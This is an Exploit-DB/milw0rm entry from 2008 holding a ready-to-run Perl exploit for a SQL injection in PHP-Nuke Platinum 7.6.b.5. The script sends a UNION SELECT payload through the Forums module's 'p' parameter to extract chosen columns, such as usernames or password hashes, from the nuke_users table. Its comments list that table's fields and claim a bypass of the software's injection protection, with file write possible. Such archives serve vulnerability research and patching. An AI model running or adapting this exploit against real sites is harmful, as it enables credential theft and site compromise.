PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection

EDB-ID:

5295


Author:

Inphex

Type:

webapps


Platform:

PHP

Date:

2008-03-22


#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
	$a++;
	while (($k, $v) = each(%cm_n_)) {
		if ($_ eq $k) {
			${$v} = $ARGV[$a];
		}
	}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
	$url = shift;
	$reg = shift;


	$ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

	if ($content=~m/$reg/) {
	    ($f,$s,$l) = split(">>",$1);
	    $s =~s/ Post //;
	    print $column.":".$s."\n";
	}
}

# milw0rm.com [2008-03-22]